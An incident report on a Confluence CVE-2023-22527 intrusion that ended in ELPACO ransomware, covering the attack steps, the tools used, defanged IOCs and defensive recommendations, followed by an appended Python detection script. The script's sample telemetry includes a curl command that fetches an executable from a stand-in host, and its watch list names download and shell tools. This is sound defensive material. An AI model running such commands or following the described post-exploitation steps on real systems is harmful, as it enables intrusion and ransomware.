Analysis Summary
# Incident Report: Confluence Exploitation Leading to ELPACO Ransomware Deployment
## Executive Summary
An attacker exploited an unpatched template injection vulnerability (CVE-2023-22527) on an internet-facing Confluence server in late June 2024 to gain initial access. Following initial compromise, the threat actor established persistence, escalated privileges to SYSTEM, and used tools like Mimikatz to harvest credentials. The intrusion concluded approximately 62 hours post-exploitation with the deployment of ELPACO-team ransomware, a Mimic variant. System event logs were deleted, but significant data exfiltration was not observed.
## Incident Details
- Discovery Date: Not specified (Investigation published in October/December 2024)
- Incident Date: Late June 2024
- Affected Organization: Undisclosed
- Sector: Undisclosed
- Geography: Undisclosed
## Timeline of Events
### Initial Access
- **Date/Time:** Late June 2024
- **Vector:** Exploitation of a public-facing Confluence Server via CVE-2023-22527 (Template Injection).
- **Details:** The first access came from IP address `45.227.254[.]124`, which ran `whoami` and then exited. Shortly afterwards, a second IP address used the same exploit to deploy a Metasploit payload (Meterpreter) that established a C2 channel to `91.191.209[.]46`. The first IP later established a direct AnyDesk connection.
### Lateral Movement
- **Date/Time:** Fourth day of intrusion onward.
- **Details:** After escalating privileges, the threat actor used tools such as Impacket Secretsdump, which suggests reconnaissance and lateral movement over native Windows protocols; the report does not describe specific movement techniques beyond the C2 activity.
### Data Exfiltration/Impact
- **Date/Time:** Approximately 62 hours after initial compromise.
- **Details:** The intrusion culminated in the deployment of ELPACO-team ransomware (Mimic variant). Some event logs were deleted. No significant data exfiltration was observed.
### Detection & Response
- **How it was discovered:** Not explicitly detailed, but the report references a DFIR investigation/CTF lab.
- **Response actions taken:** Response actions included steps to contain the ransomware, eradicate the threat, and recover systems (see Response Actions section).
## Attack Methodology
- **Initial Access:** Exploit Public-Facing Application (CVE-2023-22527 via Template Injection).
- **Persistence:** Installation of AnyDesk as a service running as SYSTEM user; creation of a local administrator account (“noname”).
- **Privilege Escalation:** Unsuccessful attempts using named pipe impersonation; successful escalation to SYSTEM using the RPCSS variant of named pipe impersonation.
- **Defense Evasion:** Deletion of event logs.
- **Credential Access:** Use of Mimikatz, ProcessHacker, and Impacket Secretsdump to harvest credentials.
- **Discovery:** Execution of Netscan (PUA - SoftPerfect Netscan); System/Network Configuration Discovery (T1016, T1018 mentioned in ATT&CK mapping).
- **Lateral Movement:** Implied use of Impacket tools.
- **Collection:** Credential harvesting.
- **Exfiltration:** No significant exfiltration observed.
- **Impact:** Data Encrypted for Impact (T1486) via ELPACO-team ransomware deployment.
## Impact Assessment
- **Financial:** Not quantified.
- **Data Breach:** Event logs were deleted. No significant external data exfiltration confirmed.
- **Operational:** Significant operational disruption via ransomware deployment (Data Encrypted for Impact).
- **Reputational:** Not disclosed.
## Indicators of Compromise
- **Network indicators (Defanged):**
- Initial Exploit IP: `45.227.254[.]124`
- C2 IP: `91.191.209[.]46`
- **File indicators:**
- PUA - SoftPerfect Netscan Execution.
- YARA signatures detected for HackTool - Impacket, Mimikatz, Metasploit Trojans, and ELPACO/Phobos Ransomware variants.
- **Behavioral indicators:**
- Suspicious Process By Web Server Process (`02070f-edeb-4d31-a010-a26c72ac5600`).
- Use of remote access software (AnyDesk) and RDP enablement.
- Execution of credential dumping tools (Mimikatz).
## Response Actions
- **Containment measures:** The report implies that containment consisted of stopping the ongoing malicious activity and halting the spread of the ransomware.
- **Eradication steps:** Eradication involved removing artifacts like the locally created admin account ("noname") and the persistence mechanism (AnyDesk service).
- **Recovery actions:** Recovery involved restoring systems impacted by the ELPACO-team ransomware deployment.
## Lessons Learned
- Unpatched, internet-facing services (Confluence) remain a primary and effective initial access vector.
- The threat actor followed a standardized playbook (AnyDesk installation, admin account creation, RDP enablement), suggesting automation.
- Privilege escalation via user-mode techniques progressed to highly privileged SYSTEM access via RPCSS named pipe impersonation.
- Reliance on multiple remote access tools (AnyDesk, Meterpreter, RDP) indicates an adaptive approach to maintaining C2 connectivity.
## Recommendations
- Implement immediate patching policies, especially for public-facing services like Confluence, prioritizing known CVEs like CVE-2023-22527.
- Implement robust monitoring and alerting on web servers that spawn unexpected child processes (e.g., C2 payloads, native tools like curl, or remote access software installation).
- Harden configurations to prevent the successful execution of common post-exploitation tools such as Mimikatz and Impacket.
- Improve detection for advanced privilege escalation techniques, specifically monitoring for named pipe impersonation against sensitive services like RPCSS.
- Ensure comprehensive logging is maintained and alerts are triggered upon log deletion events.
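As an added example (not part of the original report), the detection logic for two of the recommendations above, web servers spawning unexpected children and event log clearing, run over constructed JSON events. It assumes Sysmon-style process-creation records (event ID 1 with `parent_image` and `image` fields), that Confluence on Windows runs under a Tomcat `java.exe` service, and that log clearing surfaces as Windows event IDs 1102 (Security) or 104 (System).

```python
import json

# Parents a Confluence-on-Windows install runs under (assumption: a Tomcat java.exe service)
WEB_SERVER_PARENTS = {"java.exe", "tomcat9.exe", "w3wp.exe", "httpd.exe"}
# Children a web server process should not spawn; the report saw whoami, curl and AnyDesk
SUSPICIOUS_CHILDREN = {"whoami.exe", "cmd.exe", "powershell.exe", "curl.exe",
                       "certutil.exe", "net.exe", "anydesk.exe"}
# Windows event IDs written when an event log is cleared (Security 1102, System 104)
LOG_CLEAR_EVENT_IDS = {1102, 104}

def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event):
    """Return an alert name for one event dict, or None if it looks benign."""
    if event.get("event_id") in LOG_CLEAR_EVENT_IDS:
        return "event_log_cleared"
    if event.get("event_id") == 1:  # Sysmon process creation (schema is an assumption)
        parent = basename(event.get("parent_image", ""))
        child = basename(event.get("image", ""))
        if parent in WEB_SERVER_PARENTS and child in SUSPICIOUS_CHILDREN:
            return "web_server_spawned_child"
    return None

def scan(lines):
    """Parse newline-delimited JSON events and collect (alert, host, child) tuples."""
    alerts = []
    for line in lines:
        event = json.loads(line)
        verdict = classify(event)
        if verdict:
            alerts.append((verdict, event.get("host"), basename(event.get("image", ""))))
    return alerts

# Constructed sample telemetry, not the report's own data
SAMPLE_EVENTS = [
    r'{"event_id": 1, "host": "confluence01", "parent_image": "C:\\Confluence\\jre\\bin\\java.exe", "image": "C:\\Windows\\System32\\whoami.exe"}',
    r'{"event_id": 1, "host": "confluence01", "parent_image": "C:\\Confluence\\jre\\bin\\java.exe", "image": "C:\\Confluence\\jre\\bin\\java.exe"}',
    r'{"event_id": 1, "host": "ws05", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\cmd.exe"}',
    r'{"event_id": 1, "host": "confluence01", "parent_image": "C:\\Confluence\\jre\\bin\\java.exe", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c curl http://example.invalid/a.exe -o a.exe"}',
    r'{"event_id": 1102, "host": "confluence01", "channel": "Security"}',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The benign java.exe-to-java.exe and explorer.exe-to-cmd.exe records produce no alert, so the rule fires only on the web server parent, not on every cmd.exe launch.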